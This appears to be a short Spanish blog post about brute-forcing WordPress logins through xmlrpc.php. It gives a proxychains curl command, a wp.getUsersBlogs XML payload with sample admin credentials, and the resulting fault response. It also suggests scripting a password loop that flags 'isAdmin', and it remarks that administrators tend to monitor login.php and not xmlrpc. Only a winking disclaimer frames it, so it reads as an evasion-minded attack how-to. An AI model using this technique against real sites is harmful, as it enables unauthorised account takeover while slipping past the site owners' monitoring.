Seguro que no lo vais a usar para hacer brute force de algún Wordpress con el xmlrpc instalado, pero por si acaso, seguro que os es útil usar el comando:
proxychains curl -X POST http://dominio/xmlrpc.php -H "Content-Type: text/xml" --data-binary "@ruta al fichero"
Por ejemplo, podemos probar con estos datos:
<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>admin</string></value></param> <param><value><string>password</string></value></param></params></methodCall>
Y nos devuelve esto:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>403</int></value>
</member>
<member>
<name>faultString</name>
<value><string>Usuario o contraseña incorrecta.</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>
La gracia sería obtener esta salida:
Un script que cambie la contraseña y que pruebe, almacenando el resultado y que al encontrar un string "isAdmin" lo muestre por pantalla, sería una idea medio buena. Seguro que el administrador monitoriza el "login.php" y no el xmlrpc.
Espero que os sirva de ayuda y que seáis buenos !!!
EDITADO: Gracisa al señor @neofito tenemos un script en python ya preparado xD